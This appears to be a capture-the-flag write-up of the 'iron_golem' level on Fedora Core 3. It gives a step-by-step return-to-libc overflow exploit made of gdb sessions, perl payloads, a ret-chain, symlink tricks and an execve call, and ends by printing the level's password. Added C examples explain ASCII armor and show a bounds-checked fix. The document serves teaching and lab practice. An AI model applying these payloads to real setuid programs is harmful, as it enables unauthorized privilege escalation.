Environment changes when moving from RedHat to Fedora
1. DEP: also called a non-executable stack. Code on the stack has no execute permission, so the technique of planting shellcode on the stack and pointing the return address at it is finished.
2. ASCII Armor: the leading byte of every library address is 00 (NULL), so a library function cannot be called several times in a row; only a single library call can be made.
3. Random Stack: the stack address changes randomly on every execution, so an exact address cannot be predicted.
In the earlier LOB RedHat expedition shellcode was used heavily, but in the Fedora expedition it is easier to rely on RTL (return-to-libc) as much as possible.
Below is iron_golem, the gatekeeper of Fedora.
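As an added illustration of the ASCII Armor point (this is not code from the original post or from the LOB challenge), the C program below packs 32-bit addresses the way the perl one-liners on this page do, copies the result with strcpy() as the vulnerable program would, and counts how many words arrive intact. The two addresses are the ones quoted on this page, 0x08048441 (the ret in main) and 0x007507c0 (system); the input arrays, the helper names words_surviving_strcpy, has_nul_byte and the demo_ functions are constructed for this example.

```c
/* Added example: why a strcpy()-based overflow on an ASCII-armored system
 * can carry at most one library address, and only as the last word. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* True when the address contains a 0x00 byte: the ASCII-armor property
 * that makes strcpy() stop right there. */
int has_nul_byte(uint32_t addr) {
    int i;
    for (i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xff) == 0) return 1;
    return 0;
}

/* Serialize the words little-endian (as perl's "\x.." escapes would), copy
 * them with strcpy() like the vulnerable program, and return how many
 * leading words were copied byte-for-byte. Bytes strcpy never wrote keep
 * the 0xcc marker, so a word cut short by an early NUL is detected. */
size_t words_surviving_strcpy(const uint32_t *words, size_t nwords) {
    unsigned char src[64], dst[64];
    size_t i;
    if (nwords * 4 >= sizeof src) return 0;
    for (i = 0; i < nwords; i++) {
        src[4 * i + 0] = (unsigned char)(words[i] & 0xff);
        src[4 * i + 1] = (unsigned char)((words[i] >> 8) & 0xff);
        src[4 * i + 2] = (unsigned char)((words[i] >> 16) & 0xff);
        src[4 * i + 3] = (unsigned char)((words[i] >> 24) & 0xff);
    }
    src[4 * nwords] = '\0';
    memset(dst, 0xcc, sizeof dst);
    strcpy((char *)dst, (const char *)src);
    for (i = 0; i < nwords; i++)
        if (memcmp(dst + 4 * i, src + 4 * i, 4) != 0) return i;
    return nwords;
}

/* Constructed scenario: two ret addresses, the armored system address,
 * then one more word after it. The word after system is never copied. */
size_t demo_words_after_armored_address(void) {
    const uint32_t chain[] = {0x08048441u, 0x08048441u, 0x007507c0u, 0x08048441u};
    return words_surviving_strcpy(chain, 4);   /* 3 */
}

/* Constructed scenario: a (hypothetical) address whose NUL byte is not the
 * top byte. strcpy() truncates inside the word, so nothing survives. */
size_t demo_nul_in_middle_of_word(void) {
    const uint32_t chain[] = {0x00007507u, 0x08048441u};
    return words_surviving_strcpy(chain, 2);   /* 0 */
}

/* Constructed scenario: only NUL-free text-segment addresses; all survive. */
size_t demo_text_addresses_only(void) {
    const uint32_t chain[] = {0x08048441u, 0x08048441u};
    return words_surviving_strcpy(chain, 2);   /* 2 */
}

int main(void) {
    printf("system is ASCII-armored: %d\n", has_nul_byte(0x007507c0u));
    printf("words surviving, system in third place: %zu of 4\n",
           demo_words_after_armored_address());
    printf("words surviving, NUL mid-word: %zu of 2\n",
           demo_nul_in_middle_of_word());
    printf("words surviving, text addresses only: %zu of 2\n",
           demo_text_addresses_only());
    return 0;
}
```

The 0xcc marker is what makes the count honest: strcpy() writes its own terminating NUL, so the armored address is reported intact only because its zero byte happens to be the last one copied; anything placed after it is simply not there.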
/*
        The Lord of the BOF : The Fellowship of the BOF
        - iron_golem
        - Local BOF on Fedora Core 3
        - hint : fake ebp
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
        char buffer[256];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);   /* unbounded copy: the overflow */
        printf("%s\n", buffer);
}
It really feels like we are back where we started: easy code. The structure lets us overwrite the return address with no complications.
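For comparison, here is a hardened version of the same program. It is added here and is not part of the challenge: the unbounded strcpy() is replaced by a length-checked copy (copy_arg, a name chosen for this example), so an argument of 256 bytes or more is refused instead of reaching sfp and the return address. BUF_SIZE and the demo_ helpers are likewise assumptions of this example.

```c
/* Added example: iron_golem with the strcpy() replaced by a bounded copy. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 256

/* Copy src into dst[dstsz] only if it fits together with its terminator.
 * Returns 0 on success; -1 (dst left as an empty string) if src is too long. */
int copy_arg(char *dst, size_t dstsz, const char *src) {
    size_t n = strlen(src);
    if (dstsz == 0) return -1;
    if (n >= dstsz) {            /* no room for the terminating NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);     /* copies the NUL as well */
    return 0;
}

/* Longest argument the buffer accepts: one byte less than its size.
 * The page's pattern needs 268 bytes just to reach the return address. */
size_t max_accepted_len(void) { return BUF_SIZE - 1; }

/* Feed the hardened copy the same 272-byte pattern the page uses
 * (268 'a' then "bbbb"): it must be refused and the buffer left empty. */
int demo_overflow_attempt_rejected(void) {
    char buffer[BUF_SIZE];
    char input[273];
    memset(input, 'a', 268);
    memcpy(input + 268, "bbbb", 5);
    return copy_arg(buffer, sizeof buffer, input) == -1 && buffer[0] == '\0';
}

/* Boundary check: 255 bytes fit, 256 do not. */
int demo_boundary(void) {
    char buffer[BUF_SIZE];
    char fits[256], too_long[257];
    memset(fits, 'a', 255);     fits[255] = '\0';
    memset(too_long, 'a', 256); too_long[256] = '\0';
    if (copy_arg(buffer, sizeof buffer, fits) != 0) return 0;
    if (strlen(buffer) != 255) return 0;
    return copy_arg(buffer, sizeof buffer, too_long) == -1;
}

int main(int argc, char *argv[]) {
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }
    if (copy_arg(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", max_accepted_len());
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

Rejecting the input outright, rather than silently truncating it with strncpy(), keeps the program's behaviour explicit and leaves nothing for the remaining mitigations (non-executable stack, ASCII armor, randomized stack) to have to catch.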
[gate@Fedora_1stFloor ~]$ gdb -q iron_golem
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x080483d0 <main+0>:    push   %ebp
0x080483d1 <main+1>:    mov    %esp,%ebp
0x080483d3 <main+3>:    sub    $0x108,%esp        // stack memory allocation for the frame
0x080483d9 <main+9>:    and    $0xfffffff0,%esp
0x080483dc <main+12>:   mov    $0x0,%eax
0x080483e1 <main+17>:   add    $0xf,%eax
0x080483e4 <main+20>:   add    $0xf,%eax
0x080483e7 <main+23>:   shr    $0x4,%eax
0x080483ea <main+26>:   shl    $0x4,%eax
0x080483ed <main+29>:   sub    %eax,%esp
0x080483ef <main+31>:   cmpl   $0x1,0x8(%ebp)
0x080483f3 <main+35>:   jg     0x804840f <main+63>
0x080483f5 <main+37>:   sub    $0xc,%esp
0x080483f8 <main+40>:   push   $0x8048524
0x080483fd <main+45>:   call   0x80482f8 <_init+56>
0x08048402 <main+50>:   add    $0x10,%esp
0x08048405 <main+53>:   sub    $0xc,%esp
0x08048408 <main+56>:   push   $0x0
0x0804840a <main+58>:   call   0x8048308 <_init+72>
0x0804840f <main+63>:   sub    $0x8,%esp
0x08048412 <main+66>:   mov    0xc(%ebp),%eax
0x08048415 <main+69>:   add    $0x4,%eax
0x08048418 <main+72>:   pushl  (%eax)
0x0804841a <main+74>:   lea    0xfffffef8(%ebp),%eax
0x08048420 <main+80>:   push   %eax
0x08048421 <main+81>:   call   0x8048318 <_init+88>
0x08048426 <main+86>:   add    $0x10,%esp
0x08048429 <main+89>:   sub    $0x8,%esp
0x0804842c <main+92>:   lea    0xfffffef8(%ebp),%eax
0x08048432 <main+98>:   push   %eax
0x08048433 <main+99>:   push   $0x8048530
0x08048438 <main+104>:  call   0x80482f8 <_init+56>
0x0804843d <main+109>:  add    $0x10,%esp
0x08048440 <main+112>:  leave
0x08048441 <main+113>:  ret
0x08048442 <main+114>:  nop
0x08048443 <main+115>:  nop
End of assembler dump.
(gdb) print 0x108
$1 = 264
(gdb)
Drawing the payload layout gives the following:
[buffer = 264 ] [sfp =4 ] [ret =4] [argc =4 ][argv =4 ]
[gate@Fedora_1stFloor ~]$ cp iron_golem iron_golen
[gate@Fedora_1stFloor ~]$ ulimit -c 10000
[gate@Fedora_1stFloor ~]$ iron_golen `perl -e 'print "a"x268,"bbbb"'`
-bash: iron_golen: command not found
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"bbbb"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$ gdb -c core.7
core.7049  core.7197
[gate@Fedora_1stFloor ~]$ gdb -c core.7197
GNU gdb Red Hat Linux (6.1post-1.20040607.41rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu".
Core was generated by `./iron_golen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'.
Program terminated with signal 11, Segmentation fault.
#0  0x62626262 in ?? ()
(gdb)
We can confirm that the RET address has been overwritten with bbbb.
Next, let's find the start address of the system() function to use in RTL.
[gate@Fedora_1stFloor ~]$ gdb iron_golen
GNU gdb Red Hat Linux (6.1post-1.20040607.41rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) b main
Breakpoint 1 at 0x80483d9
(gdb) r
Starting program: /home/gate/iron_golen
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x080483d9 in main ()
(gdb) print system
$1 = {<text variable, no debug info>} 0x7507c0 <system>
(gdb)
First, let's look at the basic RTL attack payload.
[buffer 264 ] [sfp = 4 ] [ RETURN ] [argc ]
[buffer = a*264 ] [sfp = aaaa ] [ &system() ] [argc] [ &(argument to system) ] -> ln -s symbolic_link
symbolic_link.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(){
        setreuid(geteuid(), geteuid());   /* keep the effective uid as the real uid */
        system("/bin/sh");
        return 0;
}
Now let's put the address of system in RET, run it, and check the part that will serve as the argument.
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu
sh: 9ÛôþFÛôþ: command not found
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu
sh: 9»öþF»öþ: command not found
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\xc0\x07\x75"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaÀu
sh: 9kôþFkôþ: command not found
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$
We can see that something was executed, but since it is not an existing program or command we get "command not found".
And the value keeps changing. The reason is that the value being used as the argument to system still lies in the randomized stack region.
To solve this we have to get out of the stack region.
One way is to put the address of a ret instruction as the return address, have that ret return to the ret address again, and so on, repeatedly advancing eip.
Using that method, let's move the argument into a fixed region.
0x08048441 <main+113>:  ret
0x08048442 <main+114>:  nop
0x08048443 <main+115>:  nop
End of assembler dump.
(gdb)
From the GDB disassembly we know that the address of the RET instruction is 0x08048441; using this, let's build the payload in the way described above.
[buffer 264 ] [sfp = 4 ] [ RETURN ] [argc ]
[buffer = a*264 ] [sfp = aaaa ] [ ret = &ret ] [ ret = &ret ] [ ret = &ret ] ...... [ system() ] [ ] [ argument ] ln -s symbolic_link
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu
sh: ‹Uðƒì‰Á1À…Òt eô[^_]ËMè‹@·H‹Žˆ: command not found
Segmentation fault (core dumped)ÿu‹Mä‰
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAÀu
sh: ‹Uðƒì‰Á1À…Òt eô[^_]ËMè‹@·H‹Žˆ: command not found
Segmentation fault (core dumped)ÿu‹Mä‰
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\xc0\x07\x75\x00"'`
We can see that even though RET was called only twice, the same value is printed each time.
We would have to turn all of these bytes into an argument, but that looks too long, so let's overwrite RET three more times.
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu
sh: íƒ: No such file or directory
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu
sh: íƒ: No such file or directory
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$ ./iron_golen `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAÀu
sh: íƒ: No such file or directory
Segmentation fault (core dumped)
[gate@Fedora_1stFloor ~]$
Much shorter. To look at the hex value of this, let's save stderr with 2> (file descriptor 2).
[gate@Fedora_1stFloor ~]$ xxd r1.txt
0000000: 7368 3a20 6161 6161 3a20 4e6f 2073 7563 6820  sh: aaaa: No such
0000010: 6669 6c65 206f 7220 6469 7265 6374 6f72  file or director
0000020: 790a                                     y.
3a is the hex code for ':'. 73 is 's', 68 is 'h', and 20 is a space, so the bytes between them, 6161 6161, are confirmed to be the value that went in as the argument.
Let's set up a symbolic link with that name.
[gate@Fedora_1stFloor ~]$ ln -s symbolic_link `perl -e 'print "\x61\x61\x61\x61"'`
[gate@Fedora_1stFloor ~]$ ls
(??? ??? core.7364 iron_golem.c r1.txt result1.txt result.txt aaaa sh shell symbolic_link ZY??$?? ?? ? iron_golem iron_golen result result2.txt r[gate@Fedora_1stFloor sh.c shell.c symbolic_link.c ZY??$??:
[gate@Fedora_1stFloor ~]$ pwd
/home/gate
[gate@Fedora_1stFloor ~]$ export PATH = $PATH:/home/gate
-bash: export: `=': not a valid identifier
-bash: export: `/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/gate/bin:/home/gate': not a valid identifier
[gate@Fedora_1stFloor ~]$ export PATH=$PATH:/home/gate
[gate@Fedora_1stFloor ~]$ `perl -e 'print "\x61\x61\x61\x61"'`
sh-3.00$ exit
exit
[gate@Fedora_1stFloor ~]$
Attack!
[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x5,"\xc0\x07\x75\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAAAÀu
sh-3.00$ id
uid=500(gate) gid=500(gate) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$
We have come this far, but the UID did not go up.
The reason is that system() has a part in its internal routine that resets geteuid, so the elevated id cannot be kept. Therefore, instead of the address of system, we need to find the address of execve.
(gdb) p execve
$1 = {<text variable, no debug info>} 0x7a5490 <execve>
(gdb)
And we add 1 to this address to skip the prologue.
[gate@Fedora_1stFloor ~]$ strace ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\x91\x54\x7a\x00"'`
execve("./iron_golem", ["./iron_golem", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz"], [/* 20 vars */]) = 0
uname({sys="Linux", node="Fedora_1stFloor", ...}) = 0
brk(0)                                  = 0x9d16000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=28384, ...}) = 0
old_mmap(NULL, 28384, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf6ff9000
close(3)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 \17s\000"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1512400, ...}) = 0
old_mmap(0x71c000, 1207532, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x71c000
old_mmap(0x83d000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x120000) = 0x83d000
old_mmap(0x841000, 7404, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x841000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf6ff8000
mprotect(0x83d000, 8192, PROT_READ)     = 0
mprotect(0x718000, 4096, PROT_READ)     = 0
set_thread_area({entry_number:-1 -> 6, base_addr:0xf6ff8940, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xf6ff9000, 28384)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 1), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf6fff000
write(1, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 280aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz
) = 280
execve("<íƒ", [0], [/* 1 var */])      = -1 ENOENT (No such file or directory)
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++
Let's save this output to a text file and open it as hex.
[gate@Fedora_1stFloor ~]$ strace ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\x91\x54\x7a\x00"'` 2> res00.txt
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz
[gate@Fedora_1stFloor ~]$xxd res00.txt
Looking only at the parts where execve is called gives the following.
[gate@Fedora_1stFloor ~]$ xxd res00.txt | grep cve
0000000: 6578 6563 7665 2822 2e2f 6972 6f6e 5f67  execve("./iron_g
0000760: 7865 6376 6528 223c ed83 222c 205b 305d  xecve("<..", [0]
[gate@Fedora_1stFloor ~]$
0x22 is the hex code for ", so the hex bytes 3c ed 83 between the quotes are the part that went in as the argument.
Let's set up a symbolic link with that name again and attack.
[gate@Fedora_1stFloor ~]$ ln -s symbolic_link `perl -e 'print "\x3c\xed\x83"'`
[gate@Fedora_1stFloor ~]$ ./iron_golem `perl -e 'print "a"x268,"\x41\x84\x04\x08"x2,"\x91\x54\x7a\x00"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAA‘Tz
[501]
sh-3.00$ id
uid=501(iron_golem) gid=500(gate) groups=500(gate) context=user_u:system_r:unconfined_t
sh-3.00$
sh-3.00$ my-pass
euid = 501
blood on the fedora
sh-3.00$